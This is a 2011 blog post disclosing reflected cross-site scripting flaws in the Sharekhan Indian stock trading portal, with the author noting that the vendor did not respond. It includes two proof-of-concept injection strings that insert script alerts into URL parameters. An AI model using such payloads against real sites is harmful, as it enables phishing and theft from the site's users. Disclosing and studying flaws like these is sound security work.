Wednesday, July 20, 2011

Multiple XSS Vulnerabilities in Sharekhan trading Portal ( )

Vulnerability Description:

Sharekhan(Indian Stock Trading Portal) provides it’s user to trade in stock market & Manage their DP account also. Being in finance domain it should be secure & vulnerability free but it’s online portal “” contains multiple XSS ( Cross site scripting) vulnerabilities those can be used against the site users for fishing & information gathering & can be turned to their financial losses . I have tried to contact the sharekhan but didn’t got any positive response yet. So I am reported these vulnerabilities to the for further action & co-ordination with sharekhan site administrator.

These are fairly simple to discover & exploit.

Type of vulnerability : Input validation ( XSS)

Product: Sharekhan trading Portal


(User login Required )<script>alert("sharekhan pwnd2!")</script>&cid=e69da5e2d0abdf87cd1315e04a85e8f84041f9a23e279914e9dc6d274f45bd1d&sid=07b5b5b79ae54d622c869d61eea3a1add607426665b97512


(User login is not required) pwnd2!%22%29%3C/script%3Esoniji+expired%2C+please+login&


No comments:

Post a Comment